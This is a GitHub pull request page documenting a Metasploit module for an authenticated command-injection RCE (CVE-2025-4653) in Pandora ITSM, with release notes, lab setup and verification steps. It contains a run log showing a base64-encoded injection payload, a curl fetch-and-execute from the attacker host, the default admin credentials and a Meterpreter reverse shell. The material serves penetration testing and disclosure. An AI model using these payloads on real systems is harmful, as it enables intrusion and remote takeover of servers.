-
Notifications
You must be signed in to change notification settings - Fork 14.4k
Pandora ITSM auth RCE [CVE-2025-4653] #20399
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Conversation
modules/exploits/linux/http/pandora_itsm_auth_rce_cve_2025_4653.rb
Outdated
Show resolved
Hide resolved
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
msf exploit(linux/http/pandora_itsm_auth_rce_cve_2025_4653) > run verbose=true
[*] Command to run on remote host: curl -so ./qULHuihgMs http://192.168.168.128:8888/Q7JGOkCYlO14PhxIQeJRIQ;chmod +x ./qULHuihgMs;./qULHuihgMs&
[*] Fetch handler listening on 192.168.168.128:8888
[*] HTTP server started
[*] Adding resource /Q7JGOkCYlO14PhxIQeJRIQ
[*] Started reverse TCP handler on 192.168.168.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Pandora ITSM Enterprise Edition 5.0.104 Build 240802 MR97
[*] Trying to log in with admin credentials admin:integria at the Pandora ITSM Web application.
[*] Succesfully authenticated at the Pandora ITSM Web application.
[*] Saving admin credentials at the msf database.
[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
[*] RCE payload: ;echo${IFS}Y3VybCAtc28gLi9xVUxIdWloZ01zIGh0dHA6Ly8xOTIuMTY4LjE2OC4xMjg6ODg4OC9RN0pHT2tDWWxPMTRQaHhJUWVKUklRO2NobW9kICt4IC4vcVVMSHVpaGdNczsuL3FVTEh1aWhnTXMm|(base64${IFS}--decode||base64${IFS}-d)|sh;#
[*] Client 192.168.168.195 requested /Q7JGOkCYlO14PhxIQeJRIQ
[*] Sending payload to 192.168.168.195 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 192.168.168.195
[*] Meterpreter session 5 opened (192.168.168.128:4444 -> 192.168.168.195:46798) at 2025-07-24 15:01:59 +0200
[*] No payload entries found at the backup list.
meterpreter > sysinfo
Computer : 192.168.168.195
OS : Ubuntu 22.04 (Linux 6.8.0-64-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
modules/exploits/linux/http/pandora_itsm_auth_rce_cve_2025_4653.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/pandora_itsm_auth_rce_cve_2025_4653.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/pandora_itsm_auth_rce_cve_2025_4653.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/pandora_itsm_auth_rce_cve_2025_4653.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/pandora_itsm_auth_rce_cve_2025_4653.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/pandora_itsm_auth_rce_cve_2025_4653.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/pandora_itsm_auth_rce_cve_2025_4653.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/pandora_itsm_auth_rce_cve_2025_4653.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/pandora_itsm_auth_rce_cve_2025_4653.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/pandora_itsm_auth_rce_cve_2025_4653.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/pandora_itsm_auth_rce_cve_2025_4653.rb
Outdated
Show resolved
Hide resolved
|
|
Release NotesThis adds a new module for CVE-2025-4653 - authenticated remote code execution in Pandora ITSM. This module exploits a command injection vulnerability in the |
Pandora ITSM is a platform for Service Management & Support including a Helpdesk for support and customer service teams, aligned with ITIL processes.
This module exploits a command injection vulnerability in the
name
backup setting at the application setup page of Pandora ITSM. This can be triggered by generating a backup with a malicious payload injected at thename
parameter.You need to have admin access at the Pandora ITSM Web application in order to execute this RCE.
This access can be achieved by knowing the admin credentials to access the web application or leveraging a default password vulnerability in Pandora ITSM that allows an attacker to access the Pandora FMS ITSM database, create a new admin user and gain administrative access to the Pandora ITSM Web application. This attack can be remotely executed over the WAN as long as the MySQL services are exposed to the outside world.
This issue affects all ITSM Enterprise editions up to
5.0.105
and is patched at5.0.106
.The following releases were tested.
Pandora ITSM Releases:
Installation steps to install Pandora ITSM Enterprise Edition on Ubuntu 22.04
apt update && apt upgrade
to get the latest updates.curl -SsL https://pfms.me/deploy-pandora-itsm > deploy-pandora-itsm
.deploy-pandora-itsm
and find theinstall_script
variable that refers toitsm_deploy_enterprise_ubuntu_2204.sh
.install_script='https://packages.pandorafms.com/projects/deploy/itsm/iBxbqHhtHkOnzp1rINvG/itsm_deploy_enterprise_ubuntu_2204.sh'
url
and download the file withcurl
and store it locally in the fileinstall.sh
.curl -LSs https://packages.pandorafms.com/projects/deploy/itsm/iBxbqHhtHkOnzp1rINvG/itsm_deploy_enterprise_ubuntu_2204.sh > install.sh
install.sh
with your favorite editor and change the following line FROM:INTEGRIA_PACKAGE_ENT="https://packages.pandorafms.com/c5553382c7268ea9d69dd2f889029162/latest/PandoraITSM_enterprise-latest.tar.gz"
INTEGRIA_PACKAGE_ENT="https://packages.pandorafms.com/c5553382c7268ea9d69dd2f889029162/LTS/PandoraITSM_enterprise-lts.tar.gz"
chmod +x install.sh
and execute the script./install.sh
.webui
viahttp://your_ip/pandoraitsm
.You are now ready to test the module.
Verification Steps
msfconsole
use exploit/linux/http/pandora_itsm_auth_rce_cve_2025_4653
set rhosts <ip-target>
set rport <port>
set lhost <attacker-ip>
set target <0=Unix/Linux Command>
exploit
you should get a
reverse shell
orMeterpreter
session depending on thepayload
andtarget
settings.Module in action